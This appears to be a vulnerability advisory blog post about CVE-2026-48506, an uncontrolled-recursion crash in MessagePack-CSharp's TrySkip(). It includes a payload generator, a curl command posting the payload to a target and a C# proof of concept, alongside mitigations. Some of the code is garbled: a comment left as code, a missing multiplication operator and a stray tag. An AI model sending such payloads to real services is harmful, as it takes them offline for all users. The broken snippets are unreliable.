Listen to this Post
How CVE-2026-48506 Works
MessagePack-CSharp is a high-performance MessagePack serializer for .NET. Prior to versions 2.5.301 and 3.1.7, the `MessagePackReader.TrySkip()` method contains a critical flaw: it recursively descends into nested arrays and maps without incrementing the reader depth or invoking the configured depth checks. This directly bypasses MessagePackSecurity.MaximumObjectGraphDepth, the library’s documented protection mechanism against deeply nested object graphs.
The `Skip()` method is widely used by generated and dynamic formatters when they encounter unknown map keys, unknown array members, ignored fields, or any data that should be skipped for forward compatibility. An attacker can craft a MessagePack payload containing thousands of nested single‑element arrays or maps and place it in a location that the formatter will skip (e.g., an unknown field). When the formatter calls `reader.Skip()` on this attacker‑controlled value, `TrySkip()` recursively traverses every level of nesting without any depth accounting.
Because the recursion is unbounded, it rapidly exhausts the process stack and triggers a StackOverflowException. In .NET, `StackOverflowException` is uncatchable – it cannot be handled with a `try-catch` block – so the entire host process terminates immediately. This creates a reliable denial‑of‑service vector.
The attack requires no authentication and can be launched remotely by sending a crafted MessagePack payload to any application endpoint that deserializes untrusted data. `MessagePackSecurity.UntrustedData` does not mitigate this issue because the skip path does not participate in depth accounting. The vulnerability is tracked as CWE‑674 (Uncontrolled Recursion) and has been assigned a CVSS v3.1 base score of 7.5 (High).
DailyCVE Form:
Platform: MessagePack-CSharp
Version: <2.5.301,<3.1.7
Vulnerability: Uncontrolled Recursion
Severity: High (CVSS 7.5)
Date: 2026-06-22
Prediction: Patch already released (2026-06-09)
What Undercode Say
Analytics
| Metric | Value |
|–|-|
| CVSS v3.1 Base Score | 7.5 (High) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Impact (Availability) | High (process crash) |
| CWE | 674 – Uncontrolled Recursion |
| Affected Versions | All < 2.5.301 and < 3.1.7 |
| Fixed Versions | 2.5.301, 3.1.7 |
| Patch Release Date | 2026-06-09 |
Bash Commands – Testing for Vulnerability
Generate a malicious MessagePack payload with 10,000 nested single-element arrays
(MsgPack format: array of length 1 repeated N times)
python3 -c "
import struct
0x91 = fixarray(1), 0xC0 = nil
payload = b'\x91' 10000 + b'\xC0'
with open('payload.msgpack', 'wb') as f:
f.write(payload)
"
Send the payload to a vulnerable endpoint (example using curl)
curl -X POST http://target/api/deserialize \
-H "Content-Type: application/x-msgpack" \
--data-binary @payload.msgpack
Monitor for process termination (Linux)
watch -n 1 'ps aux | grep dotnet | grep -v grep'
Check if the application crashed (Windows PowerShell)
Get-Process -Name "your-app" -ErrorAction SilentlyContinue
C Code – Proof of Concept
using MessagePack;
using System;
// Vulnerable formatter that skips unknown fields
[bash]
public class TestClass
{
[Key(0)]
public int Id { get; set; }
// Attacker will send extra data that triggers Skip()
}
// Deserialization with default options (vulnerable prior to patch)
var options = MessagePackSerializerOptions.Standard;
byte[] maliciousPayload = GenerateNestedSkipPayload(); // 10k nested arrays
try
{
// This call will trigger unbounded recursion in TrySkip()
var obj = MessagePackSerializer.Deserialize<TestClass>(maliciousPayload, options);
}
catch (Exception ex)
{
// StackOverflowException cannot be caught here – process will crash
Console.WriteLine($"Caught: {ex.Message}");
}
Exploit
An attacker can exploit this vulnerability by sending a MessagePack payload where a skipped field contains a deeply nested structure. The exploitation steps are:
1. Identify a vulnerable endpoint – Any service that deserializes MessagePack data using an affected version and uses formatters that call `reader.Skip()` on unknown fields.
2. Craft the payload – Create a MessagePack document with a known field (to satisfy the formatter) and an unknown field whose value is a single‑element array or map nested thousands of times deep. The nesting depth only needs to exceed the stack size (typically a few thousand frames on .NET).
3. Deliver the payload – Send the payload via HTTP, WebSocket, or any other transport that accepts MessagePack.
4. Trigger the crash – When the formatter encounters the unknown field, it calls reader.Skip(), which recursively descends the nested structure without depth checks, causing a `StackOverflowException` that terminates the process.
No special resolver, compression mode, or authentication is required. The attack is reliable and can be repeated to keep the service offline.
Protection
Recommended Action: Upgrade to a patched version immediately.
| Release Line | Fixed Version |
|–||
| 2.x | 2.5.301 or later |
| 3.x | 3.1.7 or later |
If immediate upgrade is not possible:
- Custom depth validation – Implement application‑level logic that validates the nesting depth of incoming MessagePack data before passing it to the serializer. Reject payloads that exceed a safe threshold.
- Strict schema validation – Validate incoming MessagePack against a strict schema outside the library, rejecting any unknown fields or extra values before the serializer sees them. This reduces the attack surface but does not eliminate it if the formatter still skips valid fields.
- Monitoring and auto‑restart – Deploy a watchdog that detects process termination and automatically restarts the service to reduce downtime.
- Reduce message size limits – While not a complete fix, limiting the maximum accepted message size can increase the cost of exploitation.
The vendor fix modifies `TrySkip()` to either:
- Use iterative traversal instead of recursion, or
- Apply the existing depth accounting to arrays and maps encountered during skip operations, throwing a catchable `MessagePackSerializationException` when the depth limit is exceeded.
Impact
- Denial of Service (DoS) – The vulnerability allows a remote, unauthenticated attacker to crash the application process reliably.
- Process termination – Because `StackOverflowException` is uncatchable in .NET, the entire host process terminates immediately, affecting all users of that process.
- Wide attack surface – Many generated and dynamic formatters call `reader.Skip()` when encountering unknown map keys, unknown array members, ignored fields, or data skipped for forward compatibility. This makes the vulnerability reachable during normal object deserialization.
- No authentication required – The attack can be launched remotely without any credentials.
- No special configuration needed – The attacker does not need to target a specific resolver or compression mode.
- Critical for public-facing services – Any application that accepts untrusted MessagePack payloads (e.g., APIs, microservices, game servers) is at high risk of being taken offline repeatedly.
CVE-2026-48506 is tracked separately from other MessagePack‑CSharp vulnerabilities (e.g., CVE‑2026‑48513 for DynamicUnionResolver depth bypass, CVE‑2026‑48502 for DateTime stack allocation) because it is independently fixable in the skip traversal implementation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
